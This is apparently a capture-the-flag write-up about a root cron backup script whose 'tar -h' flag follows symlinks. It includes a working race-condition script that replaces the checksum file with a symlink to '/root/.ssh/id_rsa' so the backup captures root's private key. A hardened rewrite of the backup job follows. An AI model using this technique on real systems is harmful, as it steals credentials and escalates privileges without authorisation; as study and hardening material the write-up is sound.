Abusing dereference
Reviewing the code inside we get this:
#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*
As we can notice, there is a strange flag in the last tar command, -h:
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
After reading the manual for tar, we can see that this flag makes tar follow symlinks and dump the files they point to:
--exclude-vcs-ignores
    Exclude files that match patterns read from VCS-specific ignore files.
    Supported files are: .cvsignore, .gitignore, .bzrignore, and .hgignore.
-h, --dereference
    Follow symlinks; archive and dump the files they point to.
--hard-dereference
    Follow hard links; archive and dump the files they refer to.
With this in mind, we can set up a race condition: during the 5-second sleep between writing the checksum and archiving it, delete the checksum file and replace it with a symlink pointing to a file that lets us escalate privileges (root's id_rsa, for example).
First we need a script that waits for the checksum file to appear, removes it and creates our symlink to root's id_rsa in its place, like this:
#!/bin/bash
# Poll until the backup job writes its checksum file, then replace it with a
# symlink so the tar -h run archives the link target instead of the checksum.
while true
do
    if [ -e /opt/backups/checksum ]
    then
        rm -rf /opt/backups/checksum
        ln -s /root/.ssh/id_rsa /opt/backups/checksum
        break
    fi
done
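A hardened version of the cron backup script, as an added example rather than code from the page or the box: it stages in a private mktemp directory, drops -h so symlinks are archived as links, and refuses any input that is not a regular file, which closes the window the script above exploits. SRC_DIR and DEST_DIR replace the hard-coded paths, and GNU tar and coreutils are assumed.

```shell
#!/bin/bash
# Hardened rewrite of the cron backup job (added example, not the page's
# original script). SRC_DIR and DEST_DIR are parameters instead of the
# hard-coded /var/www/app and /var/backups/web_backups.
set -euo pipefail

# Succeeds only for a regular file that is not a symlink. A checksum file
# that has been swapped for a symlink (the race above) fails this check.
reject_symlink() {
    [ -f "$1" ] && [ ! -L "$1" ]
}

# backup_app SRC_DIR DEST_DIR -> prints the path of the archive it wrote.
backup_app() {
    local src="$1" dest="$2"
    local stage inner outer
    # Private staging directory: mktemp creates it with mode 0700 and an
    # unpredictable name, so no other local user can pre-create or swap
    # files inside it (the original staged in the shared /opt/backups).
    stage=$(mktemp -d)
    inner="$stage/app.tar"
    outer="$dest/$(date +%s%N).tar"

    # Archive relative to SRC_DIR and without -h: symlinks are stored as
    # links and their targets are never opened.
    tar -cf "$inner" -C "$src" .
    sha1sum "$inner" | cut -d ' ' -f1 > "$stage/checksum"

    # Re-check both inputs are plain files immediately before packaging.
    reject_symlink "$stage/checksum"
    reject_symlink "$inner"
    tar -cf "$outer" -C "$stage" checksum app.tar

    rm -rf "$stage"
    printf '%s\n' "$outer"
}
```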
Examples: Epsilon